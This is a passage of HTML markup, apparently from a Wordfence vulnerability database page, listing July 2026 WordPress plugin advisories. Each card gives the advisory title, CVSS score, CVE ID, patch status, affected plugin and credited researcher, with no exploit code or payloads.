<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/aeonrisk" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ee735beacaf16f47977b30dfa415ca5b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ee735beacaf16f47977b30dfa415ca5b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/aeonrisk" target="_blank" rel="noopener">AeonRisk</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ce8ec66f-5efc-4354-8871-8e35ab4e51fc" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b412f60f-61ea-47b1-a3ef-17275f7951df" target="_blank" rel="noopener">SAML Single Sign On &lt;= 5.4.4 &#8211; Unauthenticated Authentication Bypass via SAMLResponse Parameter</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15981" target="_blank" rel="noopener noreferrer">							CVE-2026-15981						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/miniorange-saml-20-single-sign-on-2" target="_blank" rel="noopener">SAML Single Sign On – SSO Login</a> <span class="wfvr-software-slug">[miniorange-saml-20-single-sign-on]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/supakiad-s" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2be53568b04545bf9e036c375a3d44d9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2be53568b04545bf9e036c375a3d44d9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/supakiad-s" target="_blank" rel="noopener">Supakiad S. (m3ez)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b412f60f-61ea-47b1-a3ef-17275f7951df" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0f6d3435-61b9-4986-9da9-b58d1bbc2271" target="_blank" rel="noopener">SMS Alert – SMS &amp; OTP for WooCommerce, Order Notifications &amp; Abandoned Cart Recovery &lt;= 3.9.6 &#8211; Unauthenticated Privilege Escalation</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-59540" target="_blank" rel="noopener noreferrer">							CVE-2026-59540						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sms-alert" target="_blank" rel="noopener">SMS Alert – SMS &amp; OTP for WooCommerce, Order Notifications &amp; Abandoned Cart Recovery</a> <span class="wfvr-software-slug">[sms-alert]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/taylsec" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/1fcd4731afa8285a12c991cc8c7bdb09.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1fcd4731afa8285a12c991cc8c7bdb09"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/taylsec" target="_blank" rel="noopener">Taylsec</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0f6d3435-61b9-4986-9da9-b58d1bbc2271" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2e78cb46-7964-4ba5-b9bf-d47de865dbd2" target="_blank" rel="noopener">WP BASE Booking of Appointments, Services and Events &lt;= 6.3.1 &#8211; Authenticated (Subscriber+) Privilege Escalation</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-59541" target="_blank" rel="noopener noreferrer">							CVE-2026-59541						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-base-booking-of-appointments-services-and-events" target="_blank" rel="noopener">WP BASE Booking of Appointments, Services and Events</a> <span class="wfvr-software-slug">[wp-base-booking-of-appointments-services-and-events]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/afan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/890bcfbaf2c84c9c872bf1c027848673.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="890bcfbaf2c84c9c872bf1c027848673"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/afan" target="_blank" rel="noopener">Afan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2e78cb46-7964-4ba5-b9bf-d47de865dbd2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b8034a3b-9a25-479d-b0d8-30ed4fd76333" target="_blank" rel="noopener">Broadcast Live Video &lt;= 7.2.4 &#8211; Unauthenticated Arbitrary File Deletion</a></h4>
<div class="cvss-score-badge">9.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.1 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-57716" target="_blank" rel="noopener noreferrer">							CVE-2026-57716						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/videowhisper-live-streaming-integration" target="_blank" rel="noopener">Broadcast Live Video – Live Streaming : WebRTC, HLS, RTSP, RTMP</a> <span class="wfvr-software-slug">[videowhisper-live-streaming-integration]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4e130f207b6dc84614b81d6d7fd4b475.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4e130f207b6dc84614b81d6d7fd4b475"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener">dutafi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b8034a3b-9a25-479d-b0d8-30ed4fd76333" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/46093b88-2f3c-4e06-833c-6a073cafda0f" target="_blank" rel="noopener">Participants Database &lt;= 2.7.8.3 &#8211; Unauthenticated Arbitrary File Deletion</a></h4>
<div class="cvss-score-badge">9.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.1 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-59555" target="_blank" rel="noopener noreferrer">							CVE-2026-59555						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/participants-database" target="_blank" rel="noopener">Participants Database</a> <span class="wfvr-software-slug">[participants-database]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hhhai" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d1f39a6f73f4287f8e67a2fe1f852ba7.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d1f39a6f73f4287f8e67a2fe1f852ba7"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hhhai" target="_blank" rel="noopener">hhhai</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/46093b88-2f3c-4e06-833c-6a073cafda0f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b95ec70c-ac76-48fa-9d9d-01cf1983e504" target="_blank" rel="noopener">Fluent Forms Pro Add On Pack &lt;= 6.2.6 &#8211; Authenticated (Subscriber+) PHP Object Injection to Arbitrary User Password Change via User Meta Field</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15962" target="_blank" rel="noopener noreferrer">							CVE-2026-15962						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 25, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluentformpro" target="_blank" rel="noopener">Fluent Forms Pro Add On Pack</a> <span class="wfvr-software-slug">[fluentformpro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b95ec70c-ac76-48fa-9d9d-01cf1983e504" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2a691f92-9eff-4777-8198-b7cc5d9e73c0" target="_blank" rel="noopener">MDJM Event Management &lt;= 1.7.8.4 &#8211; Authenticated (Subscriber+) Privilege Escalation via &#8216;set-permissions&#8217; and &#8216;change_role&#8217; Handlers</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15017" target="_blank" rel="noopener noreferrer">							CVE-2026-15017						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mobile-dj-manager" target="_blank" rel="noopener">MDJM Event Management</a> <span class="wfvr-software-slug">[mobile-dj-manager]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/moonge" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3134259fccb2cd11ac78ae74096b9b91.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3134259fccb2cd11ac78ae74096b9b91"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/moonge" target="_blank" rel="noopener">moonge</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2a691f92-9eff-4777-8198-b7cc5d9e73c0" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/51d0ba58-614e-4284-ae0b-b0b76fc5c46d" target="_blank" rel="noopener">WPO365 | SEAMLESS WORDPRESS + MICROSOFT INTEGRATION (WPO365 | LOGIN) &lt;= 43.2 &#8211; Cross-Site Request Forgery to Privilege Escalation via Plugin Settings Update</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15212" target="_blank" rel="noopener noreferrer">							CVE-2026-15212						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpo365-login" target="_blank" rel="noopener">WPO365 | SEAMLESS WORDPRESS + MICROSOFT INTEGRATION (WPO365 | LOGIN)</a> <span class="wfvr-software-slug">[wpo365-login]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/osvaldo-noe-gonzalez-del-rio" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ed1755942aa6cb7ca0583880be85d3b3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ed1755942aa6cb7ca0583880be85d3b3"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/osvaldo-noe-gonzalez-del-rio" target="_blank" rel="noopener">Osvaldo Noe Gonzalez Del Rio (Os)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/51d0ba58-614e-4284-ae0b-b0b76fc5c46d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/47ed52b3-4bfe-46ce-aabc-7a4647ab7db5" target="_blank" rel="noopener">Easy Appointments &lt;= 3.12.27 &#8211; Missing Authorization to Authenticated (Contributor+) Arbitrary Connection Deletion</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-8789" target="_blank" rel="noopener noreferrer">							CVE-2026-8789						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-appointments" target="_blank" rel="noopener">Easy Appointments</a> <span class="wfvr-software-slug">[easy-appointments]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vamshi-krishna-upadrasta" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0b4644b05bd456bc0330957bd08dbab.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0b4644b05bd456bc0330957bd08dbab"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vamshi-krishna-upadrasta" target="_blank" rel="noopener">Vamshi Krishna Upadrasta</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/47ed52b3-4bfe-46ce-aabc-7a4647ab7db5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7a6a39d6-570a-4ffe-b9a4-abdfbebd7a61" target="_blank" rel="noopener">Kali Forms — Contact Form &amp; Drag-and-Drop Builder &lt;= 2.4.18 &#8211; Authenticated (Subscriber+) Arbitrary File Deletion</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-59542" target="_blank" rel="noopener noreferrer">							CVE-2026-59542						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kali-forms" target="_blank" rel="noopener">Kali Forms — Contact Form &amp; Drag-and-Drop Builder</a> <span class="wfvr-software-slug">[kali-forms]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7a6a39d6-570a-4ffe-b9a4-abdfbebd7a61" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/02bfe680-d20d-4246-8fdb-11815114975a" target="_blank" rel="noopener">Picture Gallery – Frontend Image Uploads, AJAX Photo List &lt;= 1.6.5 &#8211; Authenticated (Contributor+) Arbitrary File Deletion</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-57696" target="_blank" rel="noopener noreferrer">							CVE-2026-57696						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/picture-gallery" target="_blank" rel="noopener">Picture Gallery – Frontend Image Uploads, AJAX Photo List</a> <span class="wfvr-software-slug">[picture-gallery]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hhhai" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d1f39a6f73f4287f8e67a2fe1f852ba7.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d1f39a6f73f4287f8e67a2fe1f852ba7"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hhhai" target="_blank" rel="noopener">hhhai</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/02bfe680-d20d-4246-8fdb-11815114975a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e3bb083c-af58-41f3-a14a-f45408e18d72" target="_blank" rel="noopener">Thrive Quiz Builder &lt;= 10.9.3.0 &#8211; Unauthenticated PHP Object Injection</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-59544" target="_blank" rel="noopener noreferrer">							CVE-2026-59544						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/thrive-quiz-builder" target="_blank" rel="noopener">Thrive Quiz Builder</a> <span class="wfvr-software-slug">[thrive-quiz-builder]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vantastic" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ba04da1dd94296eb4136b3e7bd671e6c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ba04da1dd94296eb4136b3e7bd671e6c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vantastic" target="_blank" rel="noopener">VanTastic</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e3bb083c-af58-41f3-a14a-f45408e18d72" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/45c8d883-1f97-4c9d-b406-c61e33a0959e" target="_blank" rel="noopener">WP Foodbakery &lt;= 4.9 &#8211; Authenticated (Subscriber+) Arbitrary File Deletion via via delete_locations_backup_file AJAX Action</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15802" target="_blank" rel="noopener noreferrer">							CVE-2026-15802						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-foodbakery" target="_blank" rel="noopener">WP Foodbakery</a> <span class="wfvr-software-slug">[wp-foodbakery]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rafie-muhammad" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/bdcb43576544351fa89720015a32ba9b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="bdcb43576544351fa89720015a32ba9b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rafie-muhammad" target="_blank" rel="noopener">Rafie Muhammad</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/45c8d883-1f97-4c9d-b406-c61e33a0959e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b267f163-966a-43f7-8a7c-67d34c2c7e9d" target="_blank" rel="noopener">WPForms Pro &lt;= 1.10.1.1 &#8211; Unauthenticated Arbitrary File Write via Chunked Upload Init/Finalize Ordering</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-10818" target="_blank" rel="noopener noreferrer">							CVE-2026-10818						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 24, 2026</strong>
			</div>
</p></div>
<div class="row">
